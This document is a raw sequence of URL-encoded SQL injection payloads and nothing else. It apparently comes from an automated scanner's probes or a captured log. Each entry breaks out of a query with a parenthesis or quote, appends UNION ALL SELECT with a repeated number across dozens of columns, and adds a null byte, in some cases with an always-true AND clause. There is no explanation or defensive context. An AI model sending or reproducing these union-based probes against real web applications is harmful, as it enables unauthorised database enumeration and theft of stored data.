-1726%29%20UNION%20ALL%20SELECT%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%00 -9958%27%29%20UNION%20ALL%20SELECT%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%00 -4552%27%29%20UNION%20ALL%20SELECT%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%00 -6012%27%29%20UNION%20ALL%20SELECT%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%00 -2711%27%29%20UNION%20ALL%20SELECT%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%00 -7943%27%29%20UNION%20ALL%20SELECT%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%00 -6567%27%29%20UNION%20ALL%20SELECT%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%00 -9808%27%29%20UNION%20ALL%20SELECT%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%2C%207559%00 -9083%27%29%20UNION%20ALL%20SELECT%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%00 -5255%27%29%20UNION%20ALL%20SELECT%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%00 -6179%27%29%20UNION%20ALL%20SELECT%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%00 -2672%27%20UNION%20ALL%20SELECT%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%2C%209531%00 -5745%27%20UNION%20ALL%20SELECT%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%2C%209129%00 -9386%27%20UNION%20ALL%20SELECT%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%00 -6060%27%20UNION%20ALL%20SELECT%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%2C%208345%00 -6690%27%20UNION%20ALL%20SELECT%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%00 -3464%27%20UNION%20ALL%20SELECT%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%00 -6311%27%20UNION%20ALL%20SELECT%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%00 -1629%27%20UNION%20ALL%20SELECT%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%00 -6177%27%20UNION%20ALL%20SELECT%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%2C%202709%00 -1066%27%20UNION%20ALL%20SELECT%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%2C%201554%00 -3518%22%20UNION%20ALL%20SELECT%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%2C%206830%00 -4927%22%20UNION%20ALL%20SELECT%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%2C%202731%00 -5252%22%20UNION%20ALL%20SELECT%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%2C%207262%00 -6118%22%20UNION%20ALL%20SELECT%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%2C%206221%00 -6440%22%20UNION%20ALL%20SELECT%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%2C%205011%00 -5100%22%20UNION%20ALL%20SELECT%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%2C%203723%00 -1320%22%20UNION%20ALL%20SELECT%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%2C%202821%00 -8852%22%20UNION%20ALL%20SELECT%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%2C%209386%00 -8635%22%20UNION%20ALL%20SELECT%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%00 -4162%22%20UNION%20ALL%20SELECT%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%2C%205059%00 -7740%29%20UNION%20ALL%20SELECT%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%2C%204970%00%20AND%20%288199%3D8199 -3539%29%20UNION%20ALL%20SELECT%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%2C%205525%00%20AND%20%287332%3D7332 -9403%29%20UNION%20ALL%20SELECT%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%00%20AND%20%289153%3D9153 -6778%29%20UNION%20ALL%20SELECT%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%2C%208570%00%20AND%20%285128%3D5128 -7986%29%20UNION%20ALL%20SELECT%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%2C%203670%00%20AND%20%283542%3D3542 -5057%29%20UNION%20ALL%20SELECT%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%2C%201546%00%20AND%20%289606%3D9606 -2628%29%20UNION%20ALL%20SELECT%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%00%20AND%20%289553%3D9553 -8392%29%20UNION%20ALL%20SELECT%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%2C%202081%00%20AND%20%288326%3D8326 -6751%29%20UNION%20ALL%20SELECT%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%00%20AND%20%284648%3D4648 -8594%29%20UNION%20ALL%20SELECT%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%00%20AND%20%289242%3D9242 -9801%29%29%20UNION%20ALL%20SELECT%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%00%20AND%20%28%285215%3D5215 -8471%29%29%20UNION%20ALL%20SELECT%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%00%20AND%20%28%288790%3D8790 -7766%29%29%20UNION%20ALL%20SELECT%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%00%20AND%20%28%284325%3D4325 -6836%29%29%20UNION%20ALL%20SELECT%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%2C%201193%00%20AND%20%28%285401%3D5401 -3557%29%29%20UNION%20ALL%20SELECT%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%00%20AND%20%28%289555%3D9555 -3588%29%29%20UNION%20ALL%20SELECT%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%2C%209404%00%20AND%20%28%284842%3D4842 -8865%29%29%20UNION%20ALL%20SELECT%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%00%20AND%20%28%285185%3D5185 -4670%29%29%20UNION%20ALL%20SELECT%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%00%20AND%20%28%283914%3D3914 